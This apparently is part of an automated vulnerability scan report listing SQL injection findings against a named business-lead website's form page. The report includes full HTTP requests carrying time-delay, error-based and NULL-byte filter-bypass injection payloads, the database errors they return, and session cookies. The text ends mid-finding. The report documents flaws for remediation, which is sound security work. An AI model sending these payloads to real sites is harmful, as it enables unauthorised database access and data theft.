GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:25:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' at line 5

1.58. http://www.insideup.com/ppc/leadflow/bulo00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:45:01 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9941


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.59. http://www.insideup.com/ppc/leadflow/bulo00/project.php [firstname parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The firstname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the firstname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:27:05 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
card&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code' OR prj.project_pa' at line 5

1.60. http://www.insideup.com/ppc/leadflow/bulo00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc%00'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:47:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 9182


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
R(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc%00''&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=1ofglarcbhtq982a0nk7vjnhn1; JSESSIONID=C0BDC6556DCB75CF40C6BC51D5FC3F91; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:47:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.61. http://www.insideup.com/ppc/leadflow/bulo00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the iusrc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=SELECT%20pg_sleep(25)--&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=oe59si9cceia3avrh9tdjp5lr2; JSESSIONID=A56BEAF6794AE3C017EE1E3398D31303; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:17:25 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8326


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

1.62. http://www.insideup.com/ppc/leadflow/bulo00/project.php [iusrc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/bulo00/project.php

Issue detail

The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc'&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:41:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10118


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'loan&attributeId_430=2792__$15,000 - 24,999&attributeId_431=2801__A business tha' at line 5

Request 2

